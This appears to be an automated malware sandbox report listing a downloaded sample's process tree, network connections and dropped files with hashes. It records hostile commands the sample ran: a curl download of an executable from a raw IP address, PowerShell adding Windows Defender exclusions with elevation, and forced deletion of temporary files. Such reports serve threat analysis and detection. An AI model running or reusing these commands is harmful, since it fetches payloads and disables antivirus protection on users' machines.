PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/OVEE6R

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffea0def208,0x7ffea0def214,0x7ffea0def220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3420,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3432,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4844,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=4800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5020,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4644,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5660,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1132

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=3388,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4868,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6252,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:14

C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe

"C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CF37.tmp\CF38.tmp\CF39.bat C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\Downloads\LB3.exe" "http://45.86.155.76/LB3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath ''C:\Users\Admin\Downloads''; Add-MpPreference -ExclusionProcess ''C:\Users\Admin\Downloads\LB3.exe'' -ErrorAction Stop' -Verb RunAs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads'; Add-MpPreference -ExclusionProcess 'C:\Users\Admin\Downloads\LB3.exe' -ErrorAction Stop

C:\Users\Admin\Downloads\LB3.exe

"C:\Users\Admin\Downloads\LB3.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\printfilterpipelinesvc.exe

C:\Windows\system32\printfilterpipelinesvc.exe -Embedding

C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{4E7ABF30-AA79-4246-8352-F703D4A19605}.xps" 133893831807900000

C:\ProgramData\1336.tmp

"C:\ProgramData\1336.tmp"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:14

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\1336.tmp >> NUL

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:14

C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe

"C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8BEF.tmp\8BF0.tmp\8BF1.bat C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\Downloads\LB3.exe" "http://45.86.155.76/LB3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath ''C:\Users\Admin\Downloads''; Add-MpPreference -ExclusionProcess ''C:\Users\Admin\Downloads\LB3.exe'' -ErrorAction Stop' -Verb RunAs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads'; Add-MpPreference -ExclusionProcess 'C:\Users\Admin\Downloads\LB3.exe' -ErrorAction Stop

C:\Users\Admin\Downloads\LB3.exe

"C:\Users\Admin\Downloads\LB3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5908,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14

C:\ProgramData\BDCE.tmp

"C:\ProgramData\BDCE.tmp"

C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{EA650E29-E080-4423-81F8-BE15EB4ED4C8}.xps" 133893832225680000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\BDCE.tmp >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 gofile.io udp
US 8.8.8.8:53 gofile.io udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
FR 45.112.123.126:443 gofile.io tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
GB 88.221.135.9:443 copilot.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
FR 45.112.123.126:443 gofile.io tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 88.221.135.9:443 copilot.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
FR 45.112.123.126:443 gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
US 8.8.8.8:53 s.gofile.io udp
US 8.8.8.8:53 api.gofile.io udp
US 8.8.8.8:53 api.gofile.io udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.91.7.6:443 api.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
N/A 224.0.0.251:5353 udp
GB 95.101.143.192:443 www.bing.com tcp
GB 95.101.143.192:443 www.bing.com udp
US 8.8.8.8:53 store-na-phx-1.gofile.io udp
US 8.8.8.8:53 store-na-phx-1.gofile.io udp
US 94.139.32.29:443 store-na-phx-1.gofile.io tcp
US 94.139.32.29:443 store-na-phx-1.gofile.io tcp
DE 45.86.155.76:80 45.86.155.76 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
DE 45.86.155.76:80 45.86.155.76 tcp
GB 23.73.139.43:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
GB 88.221.135.26:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f821a5c43f10d9fea226f14443d37b5f
SHA1 89597bc14fa324dbbff470a051ef965f5072f621
SHA256 b1acb84957d95ec2e62f13ca354ac1d1f73de0958ab5cb2d4ce2b4c9b92840aa
SHA512 c124c2417f0ec0643e301ac49ca232890deac08947496164a4bae440b1f0a60c92fbc1b94db59e911b0e6b2ad7c51c61a1900194ccec4fb0db77d09a9c287adf

\??\pipe\crashpad_1128_XMTJQOVPUGELWTNA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c45ee0655e29b0a935a305e66bba8cf
SHA1 ad52868d94ba826e1f0b9db56d8fb7ff1c8fff2e
SHA256 d23f3010a3dd3688741250e254dd07d508883c099e1911c3e7d0854be85ca599
SHA512 479b8d020e5f818a452c050f27488928faed74c6d329ab58befc860f5bf76878efcdd03bd0eb7b83f22afb4e74aa40c7a0d6bb29677cb4cc03ff4dbd2687bb2d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 03b7324925bb39c35d69535ac8321009
SHA1 38fa8c840e31c886eaaa8568d0c97be22fe55855
SHA256 43f85554862ab36e9f3800e663079a581dbd26b4e6bb5aebbd5f4f490be2ea78
SHA512 bbeba47ac7a9a94f0a8e7c705e6df628b5c34b51d9184fc2245d856fa345919dea13f2fef2e47046045589d81e651031e9b2905ea8e93127d47cc263f7bd63a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 f75cf5ed00a6b647ff418d386b6b65b9
SHA1 836a3ed9cabcbb70c9d0bc2891f3882b80bd7964
SHA256 27e98c36f7a5ae1af3e38bc479d94a2e6b807c14c4991b520e4159331fbb4aa9
SHA512 322c5016470ad869151108c15b42e8557a90b6bf423be102c9290f72272df7cb1ef76ddb3f2fbba8394dc9a0f0609152ee85930d5e0ae46612e0376355af43c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 2b66d93c82a06797cdfd9df96a09e74a
SHA1 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256 d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA512 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe

MD5 f2a312cc2fd4a0fbbbbd494c2486a700
SHA1 9e551c7d9781dc6c2f5ad9717aa940e8bc5aa1b4
SHA256 9fc236e54d4c03921600abfdf9fe4197a4bf45c3f66b8f8b6d2bee06a9dfce3f
SHA512 ea1f7919246253a0decd91106f006d146e8e9e041de4584d90870d59496f50b88ecd577a17ea8bd882b5a95721d85515074a9e304686fb70218a18375e9a0674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b076eeac49ab019e35bcb5e3e2ae6e5a
SHA1 420fe199edcef14e0b032ff87b96d1b9da5fd933
SHA256 96c87d88d0ba6c4aea299a1f1dd5d66edef017cb0fcc3c75c26b512df7405bb8
SHA512 a14936ce26c0aef3d4d9f4088971bce25437851648af81afaaed2c1c2c0a2a377a232e634ad05048f72dcfa34df2a68669657b4c2ce811e55523ec22ae516948

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 847326e96e131808629a641a994291b4
SHA1 ab47b635fb1965e252ee1dbbaf8d458e0197e24e
SHA256 a3d0c424dcf30a38f4b70f586d6ae2365b46d9e3783ef6336c1eda03aa2967d8
SHA512 bac2f50bd63bfc069f515de669100ba4aac624cf1eae84a8c4ec0ee5b733e03e0bbc60e5dec3d8089364a95cff035b183e2a1c9d9fdf028cf3d17637707aec38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/2452-180-0x0000000000400000-0x000000000041D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CF37.tmp\CF38.tmp\CF39.bat

MD5 7179ef7f1a0ca3b77a8925d127a8347e
SHA1 a931a94c1df374129fb4811215c94ad481238dea
SHA256 ed11f56ad6a36e58c61222e295ed608944835a2ea93d210dbc0eec9cde4aeeec
SHA512 fd98ee54147ad59a4d38310e17b9c381fd5b754a6cdd56a3393982ae983c3d465445d5e9ef027725641ba5ef4e176e0d09f111f25e2bd64d0e902ba760fe3723

memory/2432-184-0x0000025742BF0000-0x0000025742C12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwvzmaje.k4j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\Downloads\LB3.exe

MD5 0aefd2407315d12f78f637b1e6629d60
SHA1 d6dc55b998626e70d9d3fce0b521a9376e5d095a
SHA256 125712fbc5522b61d7b303e241492457a7b4449b1ecd164fe45b0f9a972b1fd2
SHA512 92a56eef25c5337ab6592cb125091d80c7a16aff6fc6d004d6fb2a26fa4f08baeacb36f1fd110beb318962d4ae2350cd64ac31bd9e2fc2a022f63cbfa58eb422

memory/2452-199-0x0000000000400000-0x000000000041D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\JJJJJJJJJJJ

MD5 689acd63aad4586ded1d9bfd256563ae
SHA1 7a6638fd6df1fbfe513544ef173f988d8fe7e02f
SHA256 abb5520e1a4a715706161a871f3ee3649ea69db0587059ae6e7aa8478510b13b
SHA512 bfe87d4572e8fe3a144d03f6259cea8ed5956b89db99065311b87e06c97dcb6ecfba971eae4ce1f90d3d6821f6da8c16c471686c73b434bbf1d5e746b72172ac

F:\$RECYCLE.BIN\S-1-5-21-2627618461-2240074273-3604016983-1000\DDDDDDDDDDD

MD5 d9618c0c6be786c4ba1c9db689a7608d
SHA1 634931fda7af69e2071804ab0b41326b908924c5
SHA256 2be1acc3dd901f6419e15083eabf47c5635b2bce39b00defd152763daa71d85a
SHA512 2deb7ff4cd0194e8a7aa7a2fc62e485ddf7f43d688107191f2ab10f3468c802f010127d66555abed4b4b4fc3f63bffd9a9895debde59dde245994897d5a66937

C:\Users\Admin\h2ux97Q8q.README.txt

MD5 6d3791f20df8a1f087e3e1816a714c70
SHA1 92eaa16b96b8de26000d12b56f1b6534ffc329c1
SHA256 8d04e3cd50417787b8dfbe310ac0bcee84482c20cc8adf5a29d473337c44e2b4
SHA512 acfd874bcba0a67e17cbf6ac9df778cd8898b2719adf81499f890d9e85af26a3b55fffee688e1eb3bbda009f279cccd6b4805377cbc5321824c52d594a530bd7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b178b8845cbdbb4158f4c82e1228fd35
SHA1 cfc3c155eeac38990c4e596ffe541b4067663f8f
SHA256 e74edc15d5a7a2f399b3074dcbf398ea9da7a7ab474affc9d7e1999ca39d81d0
SHA512 cfd214a9c540c59deb1862149721c6fcd06d627dda5b2cc8c2d954ffbe9261318fefd30191d667a16d67a116d68f99a9bc8410e0d7722edba4ee3e5a28cb241a

C:\Users\Admin\AppData\Local\Temp\cv_debug.log

MD5 09da1f2cad543596ea956dd713e04557
SHA1 0cae660b1f1d593308117f7ef37085d865498d80
SHA256 75bc72adb5bfbc6d58ba9b67642f91a131d5fad06bf5839bce689df2f1e0a29e
SHA512 7543d76ff84730ad08e132d1a72ab7ad5fc22a384036ac25677e8b3e5ebf3a9d2a35fb671c7914f305d84b36ececbefce9c4577d724178e5d649b75956bffb10

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 28b5cc6f6b0185b06dc5a4f133ed946c
SHA1 3ac82d09676cabf70543f93c30fa939e33cb0080
SHA256 e4c6d7b3636c41678139d709cc8744526f422e4b379ed808d3561b7614e48b95
SHA512 cfd4ced4b88a9ac3a97ece24d6982ddf080c3acdf764bddb745673a18932e556a7d8b6ca2e41a0112ce862ad8038f7fcc0f636644192ed031179e5492d432796

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57f721.TMP

MD5 cbf0df469d1ddc9e46ad94476022142c
